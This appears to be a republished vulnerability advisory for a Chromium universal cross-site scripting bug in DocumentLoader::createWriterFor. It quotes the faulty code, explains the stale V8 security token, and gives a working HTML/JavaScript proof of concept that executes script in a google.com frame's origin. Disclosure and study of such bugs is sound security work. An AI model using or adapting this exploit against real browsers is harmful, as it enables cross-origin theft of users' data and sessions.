third_party/WebKit/Source/core/loader/DocumentLoader.cpp:735
:
PassRefPtrWillBeRawPtr<DocumentWriter> DocumentLoader::createWriterFor(const Document ownerDocument, const DocumentInit& init,
const AtomicString& mimeType, const AtomicString& encoding, bool dispatch, ParserSynchronizationPolicy parsingPolicy)
{
LocalFrame* frame = init.frame();
ASSERT(!frame->document() || !frame->document()->isActive());
ASSERT(frame->tree().childCount() == 0);
if (!init.shouldReuseDefaultView())
frame->setDOMWindow(LocalDOMWindow::create(*frame));
RefPtrWillBeRawPtr<Document> document = frame->localDOMWindow()->installNewDocument(mimeType, init);
if (ownerDocument) {
document->setCookieURL(ownerDocument->cookieURL());
document->setSecurityOrigin(ownerDocument->securityOrigin());
}
}
DocumentLoader calls setSecurityOrigin
instead of updateSecurityOrigin
, so while the document inherits the correct SecurityOrigin
from the owner, its associated v8 context is left with the old security token which is used for access checks.
<body>
<script>
var frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "https://www.google.com/intl/en/ads/";
frame.onload = function () {
frame.onload = null;
frame.contentWindow.frames[0].location = "data:text/html,<script>(" + function () {
frame = document.documentElement.appendChild(document.createElement("iframe"));
frame.contentWindow.setTimeout("parent.document.open()", 0);
setTimeout(function () { location = "javascript:'<script>parent.eval(\"alert(location)\")</scr" + "ipt>'" }, 0);
} + "())</scr" + "ipt>";
}
</script>
</body>
Note the document.open()
call in the repro is used to set the document URL to "about:blank" which forces the javascript: generated document to inherit the origin from the parent frame's document.
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
暂无评论